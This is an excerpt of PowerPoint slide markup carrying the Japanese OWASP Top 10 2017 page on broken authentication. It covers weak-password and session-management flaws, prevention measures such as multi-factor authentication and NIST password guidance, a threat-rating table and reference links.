              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>有効なユーザ名とパスワードのリストを持つ攻撃者による</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>アカウントリスト攻撃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のような自動化された攻撃が成功する。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>総当たり攻撃や、その他の自動化された攻撃が成功する</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"Password1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"admin/admin"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のような初期設定と同じパスワード、強度の弱いパスワード、よく使われるパスワードを登録できる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全に実装できない</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>秘密の質問</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のように、脆弱または効果的でないパスワード復旧手順やパスワードリマインダを実装している。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>平文のパスワード、暗号化したパスワード、または脆弱なハッシュ関数でハッシュ化したパスワードを保存している</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>機微な情報の露出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を参照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多要素認証を実装していない、または効果的な多要素認証を実装していない。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>からセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>が露出している</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>書き換え</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ログインに成功した後でセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>が変更されない。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>セッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>が適切に無効にならない。ログアウトまたは一定時間操作がないとき、ユーザのセッションや認証トークン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>特に、シングルサインオン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(SSO)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>トークン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>が適切に無効にならない。</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ja-JP" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>参考資料</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Proactive Controls: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ASVS: V2 Authentication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V3 Session Management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Testing Guide: Identity</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1"/>
              </a:rPr>
              <a:t>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Cheat Sheet: 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Cheat Sheet: Credential Stuffing</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Forgot Password</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Cheat Sheet: Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId16"/>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Automated Threats Handbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId16"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId17"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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8"/>
              </a:rPr>
              <a:t>NIST 800-63b: 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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9"/>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20"/>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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>防止方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>自動化された攻撃、アカウントリスト攻撃、総当たり攻撃、盗まれたユーザ名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>パスワードを再利用した攻撃を防ぐために、できる限り多要素認証を実装する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>初期アカウント</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特に管理者ユーザ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を残したまま出荷およびリリースしない。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新しいパスワードまたは変更後のパスワードが</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Top 10000 worst passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>のリストにないか照合するようなパスワード検証を実装する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>や最近の調査に基づくパスワードの方針に、パスワードの長さ、複雑性、定期変更に関するポリシーを適合させる。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アカウント列挙攻撃への対策としてユーザ登録、パスワード復旧、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を強化するため、すべての結果表示において同じメッセージを用いる。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>パスワード入力の失敗に対して回数に制限するか、段階的に遅延察せる。すべてのログイン失敗を記録するとともに、アカウントリスト攻撃、総当たり攻撃、または他の攻撃を検知したときにアプリケーション管理者に通知する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>サーバサイドで、セキュアな、ビルトインのセッション管理機構を使い、ログイン後には新たに高エントロピーのランダムなセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を生成する。セッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>に含めるべきではなく、セキュアに保存する。また、ログアウト後や、アイドル状態、タイムアウトしたセッションを無効にする。</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A2</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認証の不備</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309766067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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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rgbClr val="FEFFFF"/>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ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>攻撃者は、アカウントリスト攻撃（パスワードリスト攻撃）に使える数十億にのぼる有効なユーザ名とパスワードの組み合わせ、初期設定の管理者アカウントリスト、自動化された総当たり攻撃、辞書攻撃ツールを悪用してきます。そして、彼らはセッション管理における攻撃手法、特に有効期限が切れたセッショントークンに関連したものをよく理解しています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2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ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>一般的にユーザ認証とアクセス制御を設計・実装するため、認証の不備がよく見られます。セッション管理はユーザ認証とアクセス制御の基盤であり、ステートフルなアプリケーションすべてがセッション管理を実装しています。攻撃者は手動で認証の不備を発見し、自動化ツールによるパスワードリスト攻撃や辞書攻撃を仕掛けて、それらを攻撃できます。 </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ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
